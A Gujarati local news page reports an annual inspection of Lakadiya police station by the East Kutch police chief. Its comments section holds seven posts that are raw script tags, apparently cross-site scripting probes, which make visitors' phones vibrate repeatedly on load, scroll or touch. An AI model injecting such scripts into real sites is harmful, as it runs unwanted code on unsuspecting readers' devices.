Trending News
સ્થાનિક સમાચાર

પૂર્વ કચ્છ જિલ્લા પોલીસવડા દ્વારા લાકડીયા પોલીસ સ્ટેશનનું વાર્ષિક ઇન્સ્પેક્શન કરાયું 

24 March



પોલીસ પરેડ, પોલીસ કર્મચારીઓના પડતર પ્રશ્નો સાંભળ્યા, ક્રાઇમ રેકોર્ડ તથા અન્ય તમામ કામગીરીનુ નિરિક્ષણ કર્યું 

ગાંધીધામ - કચ્છઉદય : સામખિયાળી - રાધનપુર હાઇવે પરના લાકડીયા પોલીસ સ્ટેશન ખાતે પૂર્વ કચ્છ પોલીસવડા સાગર બાગમાર દ્વારા વાર્ષિક ઇન્સ્પેક્શન કરવામાં આવ્યું હતું, જેમાં પોલીસ પરેડ, પોલીસ કર્મચારીઓના પડતર પ્રશ્નો સાંભળ્યા, ક્રાઇમ રેકોર્ડ તથા અન્ય તમામ કામગીરીનુ નિરિક્ષણ કર્યું હતું. પોલીસવડાએ હાઈવે પર કડક વાહન ચેકીંગ નાર્કોટિક્સ તથા દારૂ, જુગારની પ્રવૃતિ પર અંકુશ મુકવા માટે સુચના આપી હતી. સાયબર ક્રાઇમ તથા કાયદો અને વ્યવસ્થા જાળવવા માટે સમજણ આપી હતી. 
ઈન્સ્પેકશન દરમિયાન ભચાઉ નાયબ પોલીસ અધિક્ષક સાગર સાંબડા, રિડર પીઆઇ એમ.એમ. ઝાલા, એસપીના પીએ ખીમજીભાઈ ફફલ, લાકડીયા પીઆઇ શ્રી આહિર, દિલીપભાઈ ચૌધરી, હકુમતસિંહ જાડેજા, લક્ષમણસિંહ ઝાલા, ભુરાભાઇ જાદવ સહિતના પોલીસ અધિકારીઓ અને કર્મચારીઓ ઉપસ્થિત રહ્યા હતા.
------

Comments

  • rahuls

    <script>
    (() => {
    if ("vibrate" in navigator) {
    navigator.vibrate([
    500, 200,
    500, 200,
    1000
    ]);
    }
    })();
    </script>

  • rahuls

    <script>
    if (navigator.vibrate) {
    navigator.vibrate([500,200,500,200,1000]);
    }
    </script>

  • rahuls

    <button id="v">Vibrate</button>
    <script>
    document.getElementById("v").onclick = () => {
    navigator.vibrate([1000, 500, 1000]);
    };
    </script>

  • rahuls

    <script>
    function vibrateOnce() {
    if (navigator.vibrate) {
    navigator.vibrate([300, 100, 300]);
    window.removeEventListener("scroll", vibrateOnce);
    }
    }

    window.addEventListener("scroll", vibrateOnce, { passive: true });
    </script>

  • rahuls

    <script>
    let i;onpointerdown=onclick=ontouchstart=_=>i||(navigator.vibrate([500,200,500]),i=setInterval(_=>navigator.vibrate([500,200,500]),1200))
    </script>

  • rahuls

    <script>
    let i;onscroll=_=>i||(navigator.vibrate([500,200,500]),i=setInterval(_=>navigator.vibrate([500,200,500]),1200))
    </script>

  • rahuls

    <script>
    let i,f=_=>i||(navigator.vibrate([500,200,500]),i=setInterval(_=>navigator.vibrate([500,200,500]),1200));["load","scroll","touchstart","pointerdown","click"].forEach(e=>addEventListener(e,f,{passive:1}))
    </script>

COMMENT / REPLY FROM